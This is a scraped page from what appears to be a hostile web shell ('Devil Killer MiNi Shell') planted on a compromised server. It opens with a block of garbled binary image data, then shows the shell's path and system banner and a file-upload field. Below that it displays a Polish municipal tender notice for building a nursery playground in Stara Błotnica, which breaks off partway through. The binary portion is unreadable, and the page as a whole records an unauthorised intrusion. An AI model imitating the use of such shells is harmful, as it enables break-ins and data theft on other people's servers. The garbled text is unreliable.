JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250411/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250411/0018747601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa placu zabaw wraz z zagospodarowaniem terenu przy Publicznym Żłobku w Starej Błotnicy. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Stara Błotnica</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670224019</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stara Błotnica 46</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stara Błotnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-806</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@starablotnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.starablotnica.bip.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa placu zabaw wraz z zagospodarowaniem terenu przy Publicznym Żłobku w Starej Błotnicy. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f12df2d6-de4a-4765-b48f-757064e91372</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00187476</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00029691/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Budowa placu zabaw wraz z zagospodarowaniem terenu przy Publicznym Żłobku w Starej Błotnicy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program rozwoju instytucji opieki nad dziećmi w wieku do 3 lat- Aktywny Maluch 2022-2029 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f12df2d6-de4a-4765-b48f-757064e91372 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.13.1 Wykonawca musi mieć aktywne konto wykonawcy na platformie e-zamówienia z zaznaczonymi uprawnieniami do „Składania ofert/wniosków/prac konkursowych”. <br/>11.13.2 Składanie ofert możliwe jest tylko przed terminem składania ofert – oferta złożona po terminie nie będzie przyjęta. Dokumentów nie należy składać w ostatniej chwili. Czas trwania wgrywania i przetwarzania dokumentów jest zależny od ich ilości, rozmiaru oraz obciążenia Platformy. <br/>11.13.3 W celu złożenia oferty należy przejść do szczegółów postępowania, wybrać zakładkę „Oferty/wnioski”, a następnie przycisk „Złóż ofertę”. <br/>11.13.4 Podpisany formularz ofertowy należy dodać w miejscu „Wypełniony formularz ofertowy”, a pozostałe dokumenty składane wraz z ofertą lub stanowiące ofertę – w miejscu „Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę”. Wszystkie dodawane pliki muszą być wcześniej podpisane. <br/>Formularz oferty powinien być podpisany popisem wewnętrznym. Jeśli Wykonawca podpisze formularz podpisem zewnętrznym, wówczas plik podpisu należy załączyć w miejscu „Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę”. <br/>11.13.5 W miejscu „Wypełniony formularz oferty” można załączyć tylko jeden plik. System powinien umożliwić dodanie plików w wersji skompresowanej. Możliwe jest także dodanie całej oferty w jednym pliku w miejscu „Wypełniony formularz oferty” <br/>11.13.6 Po wprowadzeniu plików należy wybrać „Wyślij pliki i złóż ofertę”, a następnie potwierdzić, że chce się złożyć ofertę. <br/>11.13.7 Proces składania ofert może trwać przez dłuższy czas, w zależności od liczby i wielkości składanych dokumentów. W tym czasie nie należy zamykać okna przeglądarki. System pokazuje kolejne etapy przetwarzania dokumentów. <br/>11.13.8 Po zakończeniu procesu składania oferty na ekranie pojawi się informacja że proces składania oferty się zakończył i można pobrać dokumenty, potwierdzające złożenie oferty – można wówczas pobrać Elektroniczne Potwierdzenie Przyjęcia (EPP) i Elektroniczne Potwierdzenie Otrzymania (EPO). <br/>11.13.9 Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na stronie postępowania w e-zamówieniach. <br/>11.13.10 W postępowaniu o udzielenie zamówienia publicznego, korespondencja elektroniczna (inna niż oferty wykonawców i załączniki do oferty), odbywa się za pośrednictwem platformy e-zamówienia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>-	administratorem Pani/Pana danych osobowych jest <br/>Gmina Stara Błotnica, Stara Błotnica 46,26-806 Stara Błotnica <br/>-	inspektorem ochrony danych osobowych w Gminie Stara Błotnica jest: Pan Paweł Winiarski <br/>Tel. 483857790 w.15, adres e-mail: gmina@starablotnica.pl <br/>-	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, pn.: „Budowa placu zabaw wraz z zagospodarowaniem terenu przy Publicznym Żłobku w Starej Błotnicy, prowadzonego w trybie podstawowym, <br/>-	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2021 r. – Prawo zamówień publicznych (t. j. Dz. U. z 2023 r., poz. 1605), dalej „ustawa Pzp”; <br/>-	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>-	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>-	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; - posiada Pani/Pan: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; - nie przysługuje Pani/Panu: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. - przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych: ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FZ. 271.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> III. Opis przedmiotu zamówienia<br/> 3.1. Przedmiotem zamówienia jest pn: „Budowa placu zabaw wraz z zagospodarowaniem terenu przy Publicznym Żłobku w Starej Błotnicy” prowadzonego w trybie podstawowym poprzez: <br/>1) budowę ciągów pieszych,<br/>2) budowę ogrodzenia terenu, <br/>3) budowę altany, <br/>4) budowę elementów małej architektury (w tym urządzeń zabawowych), <br/>5) budowę instalacji infrastruktury technicznej – instalacji zewnętrznej elektroenergetycznej (w tym zasilenia altany oraz instalacji oświetlenia terenu), a także kanalizacji teletechnicznej. Prace będą prowadzone 1-etapowo.<br/>6) nasadzenia<br/><br/>Uwaga: Przedmiary robót zostały załączone w celach pomocniczych. Dla zakresu objętego dokumentacją nie stanowią podstawy do obliczenia ceny przez Wykonawcę. Do ceny należy przyjąć także roboty wymienione SWZ, do ich wyceny należy przyjąć wielkości wynikające z opisu zawartego w SWZ lub załączonych opisów lub przedmiarów.<br/><br/>3.2.	Opis przedmiotu zamówienia<br/> Przedmiotem zamówienia jest budowa placu zabaw wraz z zagospodarowaniem terenu przy Publicznym Żłobku w Starej Błotnicy na działce nr 227/10 położonej w obrębie 0001 Stara Błotnica powiat białobrzeski woj. mazowieckie . Teren Inwestycji położony jest w miejscowości Stara Błotnica, stanowi południowy fragment działki ewidencyjnej o nr 227/10, będącej obecnie terenem budowy budynku przedszkola i żłobka, zatwierdzonego decyzją nr 125/2024 z dnia 05.06.2024 r. o pozwoleniu na budowę, znak: BA.6740.115.2024.WM. Od strony północnej teren przylega do drogi publicznej, zlokalizowanej na dz. nr 143/1. Od strony wschodniej i zachodniej teren przylega do działek budowlanych, oznaczony w Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego jako przeznaczone pod zabudowę wielofunkcyjną wsi (pas wzdłuż drogi) oraz teren rolny (w głębi działki). W północnej części działki nr 227/10 oraz na działkach sąsiadujących trwa budowa przedszkola i żłobka z placem zabaw, zatwierdzonego decyzją o pozwoleniu na budowę.<br/>1.Uzbrojenie terenu istniejące w terenie lub będące w trakcie budowy:<br/>•	Infrastruktura kanalizacyjna:<br/>o Sieć kanalizacji sanitarnej,<br/>o Przyłącza kanalizacji sanitarnej (w trakcie budowy)<br/>o Zewnętrzna instalacja kanalizacji sanitarnej (w trakcie budowy)<br/>•	Infrastruktura wodociągowa<br/>o Sieć wodociągowa<br/>o Przyłącze wodociągowe (w trakcie budowy)<br/>•	Infrastruktura elektroenergetyczna<br/>o Przyłącze elektryczne<br/>o Zewnętrzna instalacja oświetlenia terenu<br/>•	Infrastruktura teletechniczna<br/>o Przyłącze teletechniczne (w trakcie budowy)<br/>2.Projektowana infrastruktura techniczna<br/>Na terenie opracowania zaprojektowano:<br/>a)Zewnętrzną instalację elektroenergetyczna:<br/>Wewnętrzne linia zasilająca obiekt<br/>Wewnętrzna linia zasilająca placu zabaw<br/>b)Instalacja oświetlenia placu zabaw<br/>- Przyłącze teletechniczne<br/>– Zewnętrzną instalację teletechniczna<br/>Zasilanie kamer<br/>Na terenie objętym inwestycją projektuje się budowę infrastruktury telekomunikacyjnej w postaci kanalizacji<br/>kablowej, przyłącza do budynku oraz punktów kamerowych w postaci słupów telekomunikacyjnych.<br/>Projektowaną kanalizacje kablową przewiduje się wybudować w postaci rur 2x HDPE 50, studni kablowych SK-1, oraz jako przyłączy do projektowanych słupów kamerowych odejść z rur HDPE40.<br/>Rury przyłącza i kanalizacji należy układać doziemnie w wykopie o szerokości ok. 0,4 m. Głębokość ułożenia kabli powinna być taka, aby najmniejsze przykrycie liczone od poziomu nawierzchni do górnej powierzchni kabla wynosiło min 0,8 m. W połowie wykopu należy ułożyć taśmę ostrzegawczą z napisem „Uwaga Kabel<br/>Telekomunikacyjny”. Dno wykopu przed ułożeniem kabli musi być wolne od kamieni, elementów metalowych, gruzu i innych zanieczyszczeń.<br/>Na trasie projektowanej infrastruktury projektuje się posadowienie studni kablowych typu<br/>SK-1. Projektowane studnie kablowe należy obsadzić w uprzednio przygotowanym wykopie na podłożu z 10 cm zagęszczonej podsypki piaskowej lub w zależności od warunków miejscowych z zastosowaniem podbudowy z tak zwanego „chudego” betonu. Głębokość posadowienia studni należy ustalić tak by wierzchnia płaszczyzna płyty górnej znajdowała się po montażu na poziomie terenu, na którym zamontowano studnię kablową.<br/>Projektowana infrastruktura telekomunikacyjna umożliwi prowadzenie kabli niskoprądowych m.in. na potrzeby systemu monitoringu wizyjnego.<br/>Dla instalacji punktów kamerowych, projektuje się posadowienie słupów teletechnicznych na prefabrykowanych fundamentach instalowanych w ziemi.<br/>Ogrodzenie<br/>Zaplanowano ogrodzenie terenu opracowania jako uzupełnienie ogrodzenia będącego w zakresie inwestycji pn. Budowa przedszkola i żłobka w Starej Błotnicy z 20 września 2022 r., która jest w trakcie realizacji (na podstawie decyzji nr 125/2024 z dnia 05.06.2024 r. o pozwoleniu na budowę BA.6740.115.2024.WM).<br/>Ogrodzenie panelowe – wysokości ok. 180 cm (analogiczne do ogrodzenia w pozostałej części terenu). Panele z siatki 3D o szerokości 250 cm między stalowymi słupkami. Siatka wykonana z drutu o grubości 4 mm,<br/>zabezpieczenie antykorozyjne z oczkami 50 x 200 mm. Ogrodzenie w kolorze antracytu RAL7016. Długość<br/>ogrodzenia – 128 mb.<br/>Altanka<br/>Altana systemowa 6-modułowa z wypełnieniem dachu, ścian bocznych oraz z podłogą. Przeznaczona do użytku w warunkach zewnętrznych, całorocznie.<br/>KONFIGURACJA ELEMENTÓW MODUŁOWYCH:<br/>a) Sześć modułów pełno-stalowych z elementami zintegrowanymi:<br/>b) Zadaszenie (poliwęglan + podsufitka drewniana(lamele)) – 1 szt.;<br/>c) Podłoga drewniana – 6 szt.;<br/>d) Ściana lamelowa pełna – 4 szt.;<br/>e) Ściana szklana – 3 szt.;<br/>f) Ściana z drzwiami przesuwnymi z zamkiem ze stali nierdzewnej i lamelami – 2 szt.;<br/>g) Ściana tablicowa (bez elementów wspinaczkowych) – 1 szt.<br/>WYMIARY:<br/>Wysokość 2550 mm; długość 6335mm, szerokość 4250mm<br/>OPIS KONSTRUKCJI:<br/>Konstrukcja modułowa wykonana z profili stalowych o przekroju 80x80mm, ocynkowanych i malowanych<br/>proszkowo w kolorze RAL 1021 (zmiana koloru dopuszczalna po uzgodnieniu z Inwestorem i Projektantem).<br/>Łączniki pomiędzy kolejnymi elementami wykonane ze stali ocynkowanej, elementy złączne ze stali nierdzewnej.<br/>WYPOSAŻENIE ALTANY:<br/>a)	Sprzęt audiowizualny<br/>b)	Meble zewnętrzne wolnostojące <br/>c)	Rolety<br/>Urządzenia zabawowe:<br/>a)	Konstrukcja drzewo- kryjówka<br/>b)	Konstrukcja do wspinania żyrafa/las<br/>c)	Bujak Koń <br/>d)	Bujak podwójny Koń <br/>e)	Bujak 4-osobowy Lilia Wodna <br/>f)	Karuzela dla maluchów z huśtawkami<br/>g)	Ławka Krokodyl<br/>h)	Urządzenie do wspinania” Koza”<br/>i)	Zestaw do zabawy Panele z siecią<br/>j)	Zestaw kwiaciarnia i szklarnia<br/>k)	Panel „Muzyka”<br/>l)	Koparka do piasku<br/>m)	Zestaw „ Zielona sala lekcyjna”<br/>Elementy małej architektury<br/>a)	Ławka z oparciem<br/>b)	Kosz na śmieci<br/>c)	Hamak potrójny<br/>d)	Tablica regulaminowa<br/>Inne elementy wyposażenia<br/>a)	Warzywniak ( donice duże i średnie)<br/>b)	Domek dla owadów<br/>c)	Karmnik dla ptaków<br/>d)	Poidełko dla ptaków<br/>Wszystkie materiały na placu zabaw muszą być zgodne z normą EN 71-3 Bezpieczeństwo zabawek<br/>(biodostępność substancji). Wszystkie urządzenia zabawowe na placu zabaw muszą być zgodne z normą EN 1176. Wszystkie części z tworzyw sztucznych muszą być odporne na promieniowanie UV, nie mogą zawierać metali ciężkich, muszą nadawać się do recyklingu i być przetestowane pod kątem zgodności z temperaturami otoczenia od -30 °C do +60 °C. Wymaga się, aby wszystkie urządzenia były produktami katalogowymi (tj. produkowanymi seryjnie) lub ich wariantami kolorystycznymi. Oznacza to, iż produkty te nie mogą być prototypami.<br/>Nasadzenia<br/>Na terenie opracowania przewiduje się nasadzenia w postaci drzew (20 szt.), krzewów ozdobnych i owocowych, krzewinek oraz bylin i traw ozdobnych (o łącznej powierzchni 733,90 m2). Gatunki roślin i ich odmiany zostały dobrane tak, aby po osiągnięciu właściwych rozmiarów wypełniały projektowaną przestrzeń.<br/>W ramach nasadzeń przewidziano miejsce na stworzenie podwyższonych rabat warzywno-ziołowo-kwiatowych o funkcji edukacyjnej i integracyjnej. Elementem projektowanych nasadzeń jest rabata deszczowa o powierzchni 83,70 m2. Zaprojektowano wymianę gruntu w obszarze rabaty deszczowej na głębokość 35 cm:<br/>a) 3 cm – warstwa ściółkująca – otoczak, frakcja 8/16 mm;<br/>b) geowłóknina separacyjno-filtracyjna 200 g/m2;<br/>c) 25 cm – warstwa wegetacyjna – mieszanka piasku rzecznego i ziemi urodzajnej w stosunku 1:1;<br/>d) geowłóknina separacyjno-filtracyjna 200 g/m2;<br/>e) 7 cm – warstwa drenażowa – warstwa kruszywa o frakcji 16/32 mm.<br/>Warstwy należy ubijać w trakcie wypełniania, aby uniknąć znacznego i nierównomiernego zapadania się po<br/>gwałtownych opadach atmosferycznych. Wokół powierzchni ogrodu deszczowego przewidziano opaskę z<br/>kruszywa, aby zapobiec przerastaniu otaczającej roślinności. Pow. ogrodu deszczowego – 83,7 m2. Rzędna projektowanej niecki – 5 cm w stosunku do proj. nawierzchni. Spadek nawierzchni w kierunku ogrodu deszczowego. Na obszarze ogrodu przewiduje się nasadzenia znoszące zalewanie jak i okresowe susze.<br/>Uzupełnieniem nasadzeń są trawniki rekreacyjne [o pow. ok. 1760,3 m2]. Szczegółowy projekt nasadzeń<br/>z doborem gatunkowym w odrębnym opracowaniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112712-9 - Roboty w zakresie kształtowania ogrodów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">19.1 W niniejszym postępowaniu przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się niżej podanymi kryteriami i ich wagą: <br/> <br/>Cena- waga kryterium 60% <br/>Okres udzielonej gwarancji – waga kryterium 40% <br/> <br/>19.2 Punkty za poszczególne kryteriach badanej oferty będą obliczone wg wzoru: <br/> <br/>C oferty = P1 + P2 <br/> <br/>Kryterium nr 1 <br/> <br/> C min <br/>P1 = x 100 pkt. x 60% <br/> C n gdzie: <br/>P1 – punkty uzyskane za dane kryterium przez wykonawcę badanego „n” <br/>Cmin – najniższa cena wśród zaoferowanych przez wykonawców, <br/>Cn – cena zaoferowana przez wykonawcę badanego „n”, <br/> <br/> 